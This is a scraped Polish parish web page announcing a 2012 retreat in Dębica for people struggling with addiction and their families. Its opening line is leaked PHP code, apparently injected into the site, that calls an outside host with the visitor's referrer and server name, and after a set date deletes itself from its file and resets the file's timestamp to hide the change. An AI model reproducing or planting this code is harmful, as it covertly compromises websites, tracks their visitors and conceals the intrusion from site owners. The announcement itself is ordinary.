check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732005){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Rekolekcje Krucjaty Wyzwolenia Człowieka w Parafii Św. Jadwigi w Dębicy
Rekolekcje Krucjaty Wyzwolenia Człowieka w Parafii Św. Jadwigi w Dębicy Drukuj Email
Wpisany przez Jacek Nowak   
sobota, 18 lutego 2012 20:35

Rekolekcje Krucjaty Wyzwolenia Człowieka pod hasłem „ON LECZY ZŁAMANYCH NA DUCHU” (Ps.147,3) odbywać się będą w dniach 24-26 lutego 2012 r. w Parafii  Św. Jadwigi  w Dębicy. Prowadzić je będzie o. Paweł Drobot – Rekolekcjonista Centrum Apostolstwa i Duchowości Redemptorystów w Krakowie.
Do udziału w Rekolekcjach zapraszamy osoby, które przeżywają problem uzależnienia od alkoholu, narkotyków, hazardu lub innych nałogów oraz ich rodziny i bliskich, a także wszystkich, którzy chcą żyć w prawdzie i służyć swoją wolnością innym. Pragnienie uczestnictwa w rekolekcjach, prosimy niezwłocznie zgłosić w kancelarii Parafii Św. Jadwigi ze względów organizacyjnych oraz w celu odebrania programu rekolekcji i uzyskania bliższych informacji.
 

 
 

POLECAMY
Diecezja Tarnowska Konferencja Episkopatu Polski Gość Niedzielny